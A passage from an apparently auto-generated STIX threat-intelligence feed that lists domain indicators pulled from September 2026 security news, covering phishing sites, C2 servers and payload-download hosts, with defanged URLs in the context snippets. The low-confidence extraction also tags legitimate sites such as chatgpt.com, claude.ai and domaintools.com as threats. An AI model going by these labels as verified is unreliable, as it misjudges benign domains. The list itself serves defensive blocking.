News","url":"https://thehackernews.com/2026/09/when-whole-company-adopts-ai-what-it.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dddfbb37-9b65-4fa5-b359-7e5a2df49eb9","created":"2026-09-12T09:07:56.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: rubydoc.info","description":"Seen in \"OpenAI Agents Linked to RubyGems Campaign That Gained RCE on RubyDoc Servers\" (The Hacker News). Context: The agents are said to have exploited a design quirk in the RubyDoc.info documentation build process to exfiltrate public data from","pattern":"[domain-name:value = 'rubydoc.info']","pattern_type":"stix","valid_from":"2026-09-12T09:07:56.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/openai-agents-linked-to-rubygems.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2177b634-f034-428b-9524-f4f4440f1f8b","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gitprogram.com","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: address UTA0560 Host associated with cloud.shinewrist[.]net gitprogram[.]com Domain JungleBamboo Phishing, exploit delivery, and C2 in","pattern":"[domain-name:value = 'gitprogram.com']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--977857f9-7310-4d92-8a3d-e915c4b4ea1c","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ocr.opusaccel.top","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: 0560 Exploit-hosting and command-and-control infrastructure ocr[.]opusaccel[.]top Domain UTA0560 GRIMWEDGE JScript backdoor C2 endpoint 2","pattern":"[domain-name:value = 'ocr.opusaccel.top']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3832b6c6-4db9-481e-aa61-b7b9655451c5","created":"2026-09-12T08:04:47.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: shinewrist.net","description":"Seen in \"China-Linked Hackers Chain Chrome Zero-Day With Windows Kernel Flaw in Attacks\" (GBHackers). Context: Compromise Indicator Type Actor Description / SHA256 cloud.shinewrist[.]net Domain UTA0560 Exploit-hosting and command-and-control in","pattern":"[domain-name:value = 'shinewrist.net']","pattern_type":"stix","valid_from":"2026-09-12T08:04:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-chain-chrome-zero-day/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b483dc65-ff59-492a-92b1-ab8164c7c0ca","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: abre.ai","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspicious traffic involv","pattern":"[domain-name:value = 'abre.ai']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d43932e6-55e7-4acc-9af8-af0b759a3cc1","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: abrir.link","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also investigate suspiciou","pattern":"[domain-name:value = 'abrir.link']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d428a438-4d2b-4134-9412-6aa4db45b0e2","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: archivogratuito.online","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: g the victim environment. Mitigation Defenders should block archivogratuito[.]online and monitor or restrict traffic to associated URL-shorten","pattern":"[domain-name:value = 'archivogratuito.online']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f2986752-97c7-48ed-a381-888d22fd7df5","created":"2026-09-12T06:16:51.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: goo.su","description":"Seen in \"New Phishing Campaign Abuses Windows Mshta.exe to Steal Credentials and Secrets\" (GBHackers). Context: ict traffic to associated URL-shortening services including goo[.]su , abrir[.]link , and abre[.]ai . Teams should also invest","pattern":"[domain-name:value = 'goo.su']","pattern_type":"stix","valid_from":"2026-09-12T06:16:51.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/new-phishing-campaign-abuses-windows-mshta-exe/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6dbe3f20-5e61-49e2-9e4a-6bdbf0d86c44","created":"2026-09-11T20:19:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: policenationale.cc","description":"Seen in \"Hackers abused Claude to extract secrets from 1.8M Android apps\" (BleepingComputer). Context: . Anthropic says that 'frkoo' also set up a carding shop at policenationale[.]cc that impersonated the French national police to sell stol","pattern":"[domain-name:value = 'policenationale.cc']","pattern_type":"stix","valid_from":"2026-09-11T20:19:09.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-abused-claude-to-extract-secrets-from-18m-android-apps/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23fa6dbc-601c-4708-986d-1b05b852ef7e","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: add-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: pdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]c","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1bc4601-f5e1-490c-8db5-6de94f4e62fc","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: integratedsso.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: -passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]c","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15756518-e45e-42e9-838d-030fc9971e5b","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: keysyncos.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: d-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--56025421-05c8-423c-9fee-b368bc034ea8","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oktasession.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: mypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers c","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--733bd200-2dba-4308-be0c-a5a1a0089cf9","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeysync.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: gratedsso[.]com , oktasession[.]com , keysyncos[.]com , and oskeysync[.]com . The attackers commonly place the victim company's name","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15186f87-484d-4ff7-94f5-d511409fdb97","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: tity verification. Some examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passk","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41c770b9-f599-4e7f-883f-8bf5ff542710","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: secure-passkey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: examples seen by Microsoft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedss","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5a798c9-369f-4c3d-a8de-5855b5a97582","created":"2026-09-11T17:26:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: setupmypasskey.com","description":"Seen in \"Passkey-themed phishing attacks lead to Microsoft 365 data theft\" (BleepingComputer). Context: oft include: passkeyhelpdesk[.]com , secure-passkey[.]com , setupmypasskey[.]com , add-passkey[.]com , integratedsso[.]com , oktasession[.","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-11T17:26:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/passkey-themed-phishing-attacks-lead-to-microsoft-365-data-theft/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3c3513de-9819-4fb4-90d0-fc3fe1731a3a","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: cdn.quickdelivr.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: n of the site’s source shows an external script loaded from cdn[.]quickdelivr[.]com, a domain less than a week old and vaguely resembling t","pattern":"[domain-name:value = 'cdn.quickdelivr.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8e00191-a1ad-4809-981e-954c0fd0f518","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: domaintools.com","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: address located in Hong Kong, according to data provided by domaintools.com. Dubey attributed both the fake overlay and clipboard manip","pattern":"[domain-name:value = 'domaintools.com']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6489dd6b-48eb-47e4-a06b-80e9da8e10d1","created":"2026-09-11T15:26:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: stpi.in","description":"Seen in \"India’s STPI serves TerminalFix-style attack via fake Cloudflare check\" (CSO Online). Context: ector stakeholders. The activity was observed on the ananta.stpi[.]in subdomain by cybersecurity researcher and red teamer Vibh","pattern":"[domain-name:value = 'stpi.in']","pattern_type":"stix","valid_from":"2026-09-11T15:26:58.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4221243/indias-stpi-serves-terminalfix-style-attack-via-fake-cloudflare-check.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d681517-136d-4d53-85fc-b04dd5630535","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chatgpt.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: ok conversations: shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Ea","pattern":"[domain-name:value = 'chatgpt.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e380ca5-d2f4-4359-b5d6-51638280f427","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: claude.ai","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: started with a malicious Claude Artifact hosted on the real claude.ai domain. Since public Artifacts are meant for lightweight de","pattern":"[domain-name:value = 'claude.ai']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2dd5c28d-5129-44af-a59d-93b7fff693c4","created":"2026-09-11T14:01:11.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: grok.com","description":"Seen in \"How Threat Actors Are Turning Trusted AI Platforms Into an Attack Surface\" (BleepingComputer). Context: : shared, indexable conversations hosted on chatgpt.com and grok.com that can rank for troubleshooting searches. Each of these s","pattern":"[domain-name:value = 'grok.com']","pattern_type":"stix","valid_from":"2026-09-11T14:01:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/how-threat-actors-are-turning-trusted-ai-platforms-into-an-attack-surface/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37cdda92-2acb-4132-83e6-9615c3da5b50","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: domainlify.net","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: om Sender email address used to send campaign emails Domain domainlify[.]net Newly registered domain used in the Reply-To address Note","pattern":"[domain-name:value = 'domainlify.net']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a51f6420-c117-44c7-a77d-c05a6d263ade","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: eemusicclass.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address contact@eemusicclass[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'eemusicclass.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32a16d82-e576-421a-83bc-9dbaa29f3ba4","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lifeones.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lifeones[.]com Sender email address used to send campaign emails Domain","pattern":"[domain-name:value = 'lifeones.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0725567-b96c-4fac-bce7-20092c52a950","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lohnsteuerhilfe-aktuell-verein.de","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@lohnsteuerhilfe-aktuell-verein[.]de Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lohnsteuerhilfe-aktuell-verein.de']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6e8cc75-cd2a-4d22-b31a-637721cc2bb8","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lumalisboa.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address no-reply@lumalisboa[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'lumalisboa.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18e080ef-4a33-49e3-8696-8af8f6fb125f","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mctci.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: address used to send campaign emails Email address noreply@mctci[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'mctci.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0da53846-4c57-4ed1-ad14-cbb6fab7bec0","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: nuf.co.jp","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@nuf[.]co[.]jp Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'nuf.co.jp']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--70cb91cb-ee80-477b-8c2e-1c0b9de3f093","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: service-nowinc.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: rs of compromise (IoCs):- Type Indicator Description Domain service-nowinc[.]com Domain impersonating ServiceNow Email address gomez@servi","pattern":"[domain-name:value = 'service-nowinc.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--85487fdf-5e6a-4e84-be85-634f71087f4a","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tivityhealth.com","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tivityhealth[.]com Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tivityhealth.com']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55378f54-bb7e-4399-ae8b-d8e940312e00","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: tovimbatista.pt","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: ail address used to send campaign emails Email address info@tovimbatista[.]pt Sender email address used to send campaign emails Email a","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--872105f0-9d34-4cca-87de-354021e9cf85","created":"2026-09-11T13:38:23.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: uinsure.co.uk","description":"Seen in \"Hackers Impersonate CEOs in 1 Million Emails to Trick Employees Into $50,000 Payments\" (Cyber Security News). Context: associated with a bank account Email address notifications@uinsure[.]co[.]uk Sender email address used to send campaign emails Email","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-11T13:38:23.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-impersonate-ceos/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--986aa1aa-eaa1-435f-bddb-00c82e8db29c","created":"2026-09-11T12:14:12.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: apimantax.otax.fun","description":"Seen in \"New Android Ransomware Records Screens, Steals OTPs and Secretly Takes Photos of Victims\" (Cyber Security News). Context: bound traffic. Type Indicator Description C2 domain hxxps://apimantax[.]otax[.]fun Active command-and-control domain dynamically retrieved","pattern":"[domain-name:value = 'apimantax.otax.fun']","pattern_type":"stix","valid_from":"2026-09-11T12:14:12.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-android-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0189ed8-3920-4076-9f74-10b7567b62d7","created":"2026-09-11T09:59:29.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gitclone.org","description":"Seen in \"Hackers Exploit JFrog Artifactory Flaws to Bypass Authentication and Gain Admin Access\" (GBHackers). Context: xploiting CVE-2026-82329 2026-09-02 Not provided hxxp://log.gitclone[.]org:45678/smtp Payload download URL following CVE-2026-42018/","pattern":"[domain-name:value = 'gitclone.org']","pattern_type":"stix","valid_from":"2026-09-11T09:59:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-jfrog-artifactory-flaws/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a7f759f-815d-43b2-bb42-1167573eb521","created":"2026-09-11T09:12:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: backup-ubt.s3.us-east-1.amazonaws.com","description":"Seen in \"Hackers Deploy New SloppyRAT via ClickFix to Enable Ransomware Lateral Movement\" (Cyber Security News). Context: ws[.]net/dpp1/hostfxr[.]dll SloppyRAT DLL URL URL hxxps[://]backup-ubt[.]s3[.]us-east-1[.]amazonaws[.]com/hostfxr[.]dll SloppyRAT DLL URL Domain stro7121.blo","pattern":"[domain-name:value = 'backup-ubt.s3.us-east-1.amazonaws.com']","pattern_type":"stix","valid_from":"2026-09-11T09:12:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 